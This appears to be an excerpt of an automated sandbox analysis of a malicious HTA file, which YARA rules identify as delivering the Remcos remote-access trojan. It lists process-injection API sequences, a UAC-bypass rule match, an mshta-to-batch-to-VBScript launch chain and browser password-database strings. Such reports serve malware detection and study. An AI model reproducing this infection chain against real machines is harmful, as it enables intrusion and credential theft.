                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00418267 GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,GetLastError,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,12_2_00418267
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041C077 OpenProcess,NtSuspendProcess,CloseHandle,12_2_0041C077
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041C0A3 OpenProcess,NtResumeProcess,CloseHandle,12_2_0041C0A3
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0040BAE3 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,14_2_0040BAE3
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_004016FD NtdllDefWindowProc_A,15_2_004016FD
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_004017B7 NtdllDefWindowProc_A,15_2_004017B7
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00402CAC NtdllDefWindowProc_A,16_2_00402CAC
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00402D66 NtdllDefWindowProc_A,16_2_00402D66
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00416861 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_00416861
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042809D12_2_0042809D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045412B12_2_0045412B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004421C012_2_004421C0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004281D712_2_004281D7
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043E1E012_2_0043E1E0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041E29B12_2_0041E29B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004373DA12_2_004373DA
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043838012_2_00438380
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0045347212_2_00453472
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0042747E12_2_0042747E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043E43D12_2_0043E43D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004325A112_2_004325A1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043774C12_2_0043774C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041F80912_2_0041F809
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004379F612_2_004379F6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_004279F512_2_004279F5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0044DAD912_2_0044DAD9
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433C7312_2_00433C73
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00413CA012_2_00413CA0
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00437CBD12_2_00437CBD
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043DD8212_2_0043DD82
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00435F5212_2_00435F52
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00437F7812_2_00437F78
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0043DFB112_2_0043DFB1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1001719412_2_10017194
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_1000B5C112_2_1000B5C1
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044A03014_2_0044A030
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0040612B14_2_0040612B
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0043E13D14_2_0043E13D
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044B18814_2_0044B188
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044227314_2_00442273
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044D38014_2_0044D380
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044A5F014_2_0044A5F0
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_004125F614_2_004125F6
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_004065BF14_2_004065BF
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_004086CB14_2_004086CB
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_004066BC14_2_004066BC
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044D76014_2_0044D760
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00405A4014_2_00405A40
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00449A4014_2_00449A40
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00405AB114_2_00405AB1
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00405B2214_2_00405B22
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044ABC014_2_0044ABC0
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00405BB314_2_00405BB3
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00417C6014_2_00417C60
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044CC7014_2_0044CC70
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00418CC914_2_00418CC9
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044CDFB14_2_0044CDFB
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044CDA014_2_0044CDA0
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0044AE2014_2_0044AE20
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00415E3E14_2_00415E3E
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00437F3B14_2_00437F3B
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0040503815_2_00405038
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0041208C15_2_0041208C
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_004050A915_2_004050A9
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0040511A15_2_0040511A
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0043C13A15_2_0043C13A
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_004051AB15_2_004051AB
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0044930015_2_00449300
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0040D32215_2_0040D322
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0044A4F015_2_0044A4F0
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0043A5AB15_2_0043A5AB
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0041363115_2_00413631
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0044669015_2_00446690
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0044A73015_2_0044A730
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_004398D815_2_004398D8
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_004498E015_2_004498E0
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0044A88615_2_0044A886
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0043DA0915_2_0043DA09
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00438D5E15_2_00438D5E
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00449ED015_2_00449ED0
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_0041FE8315_2_0041FE83
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00430F5415_2_00430F54
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_004050C216_2_004050C2
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_004014AB16_2_004014AB
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_0040513316_2_00405133
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_004051A416_2_004051A4
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_0040124616_2_00401246
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_0040CA4616_2_0040CA46
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_0040523516_2_00405235
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_004032C816_2_004032C8
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_0040168916_2_00401689
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00402F6016_2_00402F60
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 004351E0 appears 55 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00434ACF appears 43 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401F96 appears 49 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00401EBF appears 36 times
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: String function: 00402117 appears 40 times
                        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 0044DDB0 appears 33 times
                        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 00418555 appears 34 times
                        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 004186B6 appears 58 times
                        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 004188FE appears 88 times
                        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 00422297 appears 42 times
                        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 00444B5A appears 37 times
                        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 00413025 appears 79 times
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2773
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2773Jump to behavior
                        Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                        Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                        Source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                        Source: classification engineClassification label: mal100.rans.spre.phis.troj.spyw.expl.evad.winHTA@21/10@3/5
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0041A225 GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,14_2_0041A225
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00417AD9 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,12_2_00417AD9
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,16_2_00410DE1
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_0041A6AF GetDiskFreeSpaceW,GetDiskFreeSpaceA,free,14_2_0041A6AF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040C03C GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,12_2_0040C03C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041B9AB FindResourceA,LoadResource,LockResource,SizeofResource,12_2_0041B9AB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041AC43 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,12_2_0041AC43
                        Source: C:\Windows\SysWOW64\wscript.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\0[1].txtJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2044:120:WilError_03
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-4E8SNN
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6612:120:WilError_03
                        Source: C:\Windows\SysWOW64\mshta.exeFile created: C:\Windows\Temp\unmovably.batJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\nonordinary.vbs"
                        Source: C:\Windows\SysWOW64\recover.exeSystem information queried: HandleInformationJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                        Source: recover.exe, recover.exe, 0000000F.00000002.1391469427.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                        Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                        Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                        Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                        Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                        Source: recover.exe, 0000000E.00000003.1402946191.0000000004C41000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000E.00000003.1404687300.0000000004C41000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000E.00000002.1405674641.0000000004C4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                        Source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                        Source: earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaVirustotal: Detection: 29%
                        Source: earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaReversingLabs: Detection: 27%
                        Source: C:\Windows\SysWOW64\recover.exeEvasive API call chain: __getmainargs,DecisionNodes,exit
                        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta"
                        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript //nologo "C:\Windows\Temp\nonordinary.vbs"
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1 /nobreak
